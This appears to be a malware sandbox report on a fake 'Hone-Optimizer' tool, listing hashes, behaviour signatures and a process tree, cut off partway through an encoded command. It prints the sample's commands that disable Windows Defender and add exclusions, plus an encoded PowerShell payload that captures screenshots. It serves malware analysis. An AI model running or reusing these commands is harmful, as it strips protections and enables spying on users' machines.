memory/3548-630-0x000002B344C90000-0x000002B344CB0000-memory.dmp
memory/3548-621-0x000002B344C50000-0x000002B344C70000-memory.dmp
memory/3548-654-0x000002B358360000-0x000002B358460000-memory.dmp
memory/3348-705-0x0000000004DC0000-0x0000000004DC1000-memory.dmp
memory/2492-706-0x000002A972140000-0x000002A972240000-memory.dmp
memory/2492-707-0x000002A972140000-0x000002A972240000-memory.dmp
memory/2492-728-0x000002A973640000-0x000002A973660000-memory.dmp
memory/2492-739-0x000002A973660000-0x000002A973680000-memory.dmp
memory/2492-738-0x000002A973680000-0x000002A9736A0000-memory.dmp
memory/2492-753-0x000002A975CD0000-0x000002A975DD0000-memory.dmp
C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\Microsoft\Internet Explorer\DOMStore\4NUNBTRQ\microsoft.windows[1].xml
| MD5 | d6c1b4bb94dc9522fb7c83c87ea5d841 |
| SHA1 | 19ea83a7d4fe8b02f285c684bdb48727c97e9196 |
| SHA256 | f1551216ac0ba29d3b3ad772ff70fd8baa6ca6194df69d51248e425884027608 |
| SHA512 | 05b9aaf43e5464d43f8b4baf7ba913f0a87b5c5adc5c5a8c865982fa341380542fc6c6dd6953bdfd826dfd0cba7db120be206730cead002dcb1b743c80cf4e34 |
memory/4864-806-0x0000000000FC0000-0x0000000000FC1000-memory.dmp
memory/1200-809-0x0000017407C00000-0x0000017407D00000-memory.dmp
memory/1200-810-0x0000017407C00000-0x0000017407D00000-memory.dmp
memory/1200-808-0x0000017407C00000-0x0000017407D00000-memory.dmp
memory/1200-841-0x0000017C0A400000-0x0000017C0A420000-memory.dmp
memory/1200-840-0x0000017C0A6F0000-0x0000017C0A710000-memory.dmp
memory/1200-823-0x0000017C0A1D0000-0x0000017C0A1F0000-memory.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2024-11-14 11:53
Reported
2024-11-14 11:59
Platform
win11-20241007-en
Max time kernel
334s
Max time network
337s
Command Line
Signatures
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Drops file in Drivers directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\System32\drivers\etc\hosts | C:\Windows\system32\attrib.exe | N/A |
| File opened for modification | C:\Windows\System32\drivers\etc\hosts | C:\Users\Admin\AppData\Local\Temp\Hone-Optimizer.exe | N/A |
| File opened for modification | C:\Windows\System32\drivers\etc\hosts | C:\Windows\system32\attrib.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\bound.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\_MEI31722\rar.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\C9E22CF5-E28A-476A-A2B2-3C0D44269A30\dismhost.exe | N/A |
Loads dropped DLL
Reads user/profile data of web browsers
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ip-api.com | N/A | N/A |
Obfuscated Files or Information: Command Obfuscation
Enumerates processes with tasklist
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\Logs\DISM\dism.log | C:\Windows\system32\Dism.exe | N/A |
| File opened for modification | C:\Windows\Logs\DISM\dism.log | C:\Users\Admin\AppData\Local\Temp\C9E22CF5-E28A-476A-A2B2-3C0D44269A30\dismhost.exe | N/A |
Browser Information Discovery
Enumerates physical storage devices
Checks SCSI registry key(s)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters | C:\Windows\system32\vssvc.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters | C:\Windows\system32\vssvc.exe | N/A |
| Key created | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters\Partmgr | C:\Windows\system32\vssvc.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters\Partmgr\PartitionTableCache = 00000000040000002fc80c284bade0450000000000000000000000000000000000000000000000000000000000000000000000000000000000001000000000000000c01200000000ffffffff0000000027010100000800002fc80c280000000000001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000d01200000000000020ed3a000000ffffffff0000000007000100006809002fc80c28000000000000d012000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000f0ff3a0000000000000005000000ffffffff000000000700010000f87f1d2fc80c28000000000000f0ff3a00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffff0000000000000000000000002fc80c2800000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 | C:\Windows\system32\vssvc.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters\Partmgr\SnapshotDataCache = 534e41505041525401000000700000008ec7416a0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 | C:\Windows\system32\vssvc.exe | N/A |
Detects videocard installed
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| N/A | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| N/A | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
Modifies registry key
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\reg.exe | N/A |
| N/A | N/A | C:\Windows\system32\reg.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\tasklist.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 34 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 35 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 36 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 34 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 35 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 36 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
Suspicious use of WriteProcessMemory
Uses Volume Shadow Copy service COM API
Views/modifies file attributes
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\Hone-Optimizer.exe
"C:\Users\Admin\AppData\Local\Temp\Hone-Optimizer.exe"
C:\Users\Admin\AppData\Local\Temp\Hone-Optimizer.exe
"C:\Users\Admin\AppData\Local\Temp\Hone-Optimizer.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Hone-Optimizer.exe'"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\bound.exe'"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "start bound.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
C:\Windows\system32\tasklist.exe
tasklist /FO LIST
C:\Users\Admin\AppData\Local\Temp\bound.exe
bound.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Hone-Optimizer.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\bound.exe'
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd" /c "C:\Users\Admin\AppData\Local\Temp\BF87.tmp\BF88.tmp\BF89.bat C:\Users\Admin\AppData\Local\Temp\bound.exe"
C:\Windows\system32\mode.com
Mode 130,45
C:\Windows\system32\reg.exe
reg add HKLM /F
C:\Windows\system32\reg.exe
reg add "HKLM\System\CurrentControlSet\Control\CrashControl" /v "DisplayParameters" /t REG_DWORD /d "1" /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "prompt #$H#$E# & echo on & for %b in (1) do rem"
C:\Windows\system32\reg.exe
reg add HKCU\CONSOLE /v VirtualTerminalLevel /t REG_DWORD /d 1 /f
C:\Windows\system32\reg.exe
reg query "HKCU\Software\Hone" /v "Disclaimer"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
C:\Windows\System32\Wbem\WMIC.exe
wmic csproduct get uuid
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"
C:\Windows\system32\reg.exe
REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"
C:\Windows\system32\reg.exe
REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
C:\Windows\System32\Wbem\WMIC.exe
wmic path win32_VideoController get name
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
C:\Windows\System32\Wbem\WMIC.exe
wmic path win32_VideoController get name
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
C:\Windows\system32\tasklist.exe
tasklist /FO LIST
C:\Windows\system32\tasklist.exe
tasklist /FO LIST
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
C:\Windows\system32\reg.exe
REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALg